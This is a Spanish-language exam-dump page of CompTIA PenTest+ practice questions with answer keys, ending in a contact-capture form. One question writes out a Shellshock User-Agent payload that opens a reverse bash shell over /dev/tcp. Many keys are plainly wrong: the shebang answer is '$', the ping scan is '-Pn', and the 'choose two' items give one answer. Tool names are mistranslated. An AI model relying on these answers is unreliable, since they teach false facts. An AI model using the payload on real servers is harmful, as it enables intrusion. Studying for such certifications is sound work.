¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

2024 Actualizado CompTIA PT0-002 Exam Questions & Practice Tests, CompTIA PenTest+ Certification | SPOTO

Prepárese para obtener la certificación CompTIA PenTest+ (PT0-002) con nuestros completos recursos de estudio. La mejor manera de asegurar el éxito en el examen es practicando con las últimas preguntas del examen. Nuestros materiales de estudio cubren una amplia gama de temas y escenarios, incluyendo pruebas de penetración prácticas y tareas de administración de vulnerabilidades. Con acceso a pruebas de práctica, preguntas de muestra, volcados de examen y preguntas y respuestas de examen, obtendrá los conocimientos y habilidades necesarios para sobresalir. Nuestros exámenes de prueba y el simulador de examen proporcionan una experiencia de examen realista para mejorar aún más su preparación. Utilice nuestros materiales y respuestas de examen para reforzar su comprensión y preparación para el examen PT0-002. Con nuestros recursos de estudio, estará bien preparado para demostrar su experiencia en ciberseguridad y lograr el éxito en la obtención de su certificación CompTIA PenTest+.
Realizar otros exámenes en línea

Cuestionar #1
Una empresa consultora está completando la ROE durante la determinación del alcance. Cuál de los siguientes puntos debe incluirse en la ROE?
A. Coste de la evaluación
B. Distribución de informes
C. Restricciones de las pruebas
D. Responsabilidad
Ver respuesta
Respuesta correcta: C
Cuestionar #2
¿Cuál de las siguientes opciones proporciona una matriz de tácticas y técnicas comunes utilizadas por los atacantes junto con las medidas de mitigación recomendadas?
A. NIST SP 800-53
B. Top 10 de OWASP
C. Marco ATT&CK de MITRE
D. Directrices técnicas PTES
Ver respuesta
Respuesta correcta: C
Cuestionar #3
Un probador de penetración le gustaría obtener credenciales FTP mediante el despliegue de una estación de trabajo como un ataque en ruta entre el objetivo y el servidor que tiene el protocolo FTP. ¿Cuál de los siguientes métodos sería el MEJOR para lograr este objetivo?
A. Esperar al siguiente inicio de sesión y realizar un ataque de downgrade en el servidor
B. Capturar el tráfico utilizando Wireshark
C. Realizar un ataque de fuerza bruta sobre el servidor
D. Usar un exploit FTP contra el servidor
Ver respuesta
Respuesta correcta: B
Cuestionar #4
¿Cuál de las siguientes herramientas proporciona clases Python para interactuar con protocolos de red?
A. Responder
B. Impacket
C. Imperio
D. PowerSploit
Ver respuesta
Respuesta correcta: B
Cuestionar #5
Un cliente ha solicitado que el escaneo de la prueba de penetración incluya los siguientes servicios UDP: SNMP, NetBIOS y DNS. Cuál de los siguientes comandos de Nmap realizará el análisis?
A. nmap -vv sUV -p 53, 123-159 10
B. nmap -vv sUV -p 53,123,161-162 10
C. nmap -vv sUV -p 53,137-139,161-162 10
D. nmap -vv sUV -p 53, 122-123, 160-161 10
Ver respuesta
Respuesta correcta: B
Cuestionar #6
Un probador de penetración se está preparando para realizar actividades para un cliente que requieren una interrupción mínima de las operaciones de la empresa. ¿Cuáles de las siguientes se consideran herramientas de reconocimiento pasivo? (Elija dos.)
A. Wireshark
B. Nessus
C. Retina
D. Suite eructo
E. Shodan
F. Nikto
Ver respuesta
Respuesta correcta: A
Cuestionar #7
Un probador de penetración está intentando descubrir rápidamente hosts activos en una subred. ¿Cuál de los siguientes comandos realizará un escaneo ping?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
Ver respuesta
Respuesta correcta: C
Cuestionar #8
Un evaluador de penetración ejecutó un análisis Nmap en un dispositivo de red con acceso a Internet con la opción -F y encontró algunos puertos abiertos. Para realizar una enumeración más detallada, el evaluador ejecutó otro análisis utilizando el siguiente comando: nmap -O -A -sS -p- 100.100.100.50 Nmap devolvió que los 65.535 puertos estaban filtrados. ¿Cuál de las siguientes situaciones es la MÁS probable que ocurriera en el segundo escaneo?
A. Un firewall o IPS bloqueó el escaneo
B. El probador de penetración utilizó banderas no soportadas
C. El dispositivo de red de borde se desconectó
D. El escaneo devolvio respuestas de eco ICMP
Ver respuesta
Respuesta correcta: D
Cuestionar #9
Una empresa que requiere una interrupción mínima de sus actividades diarias necesita un probador de penetración para llevar a cabo la recopilación de información en torno a la presencia web de la empresa. ¿Cuál de las siguientes opciones sería la MÁS útil para el evaluador en los pasos iniciales de recopilación de información? (Elija dos.)
A. Direcciones IP y subdominios
B. Transferencias de zona
C. Búsqueda directa e inversa de DNS
D. Motores de búsqueda en Internet
E. Puertos abiertos hacia el exterior
F. Resultados Shodan
Ver respuesta
Respuesta correcta: A
Cuestionar #10
Un probador de penetración descubre un servidor web vulnerable en 10.10.1.1. A continuación, el probador edita un script Python que envía un exploit web y se encuentra con el siguiente código: exploits = {"User-Agent": "() {ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} ¿Cuál de las siguientes modificaciones debe realizar el evaluador en el script para determinar el contexto de usuario en el que se ejecuta el servidor?
A. exploits = {"User-Agent": "() { ignorado;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() {ignored;};/bin/bash -i>& /dev/tcp/10
Ver respuesta
Respuesta correcta: D
Cuestionar #11
Al desarrollar un script de shell destinado a ser interpretado en Bash, debe especificarse explícitamente el intérprete /bin/bash. ¿Cuál de las siguientes combinaciones de caracteres debe utilizarse en la primera línea del script para lograr este objetivo?
A. #
B. $
C. ##
D. #$
E. ¡#!
Ver respuesta
Respuesta correcta: B

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: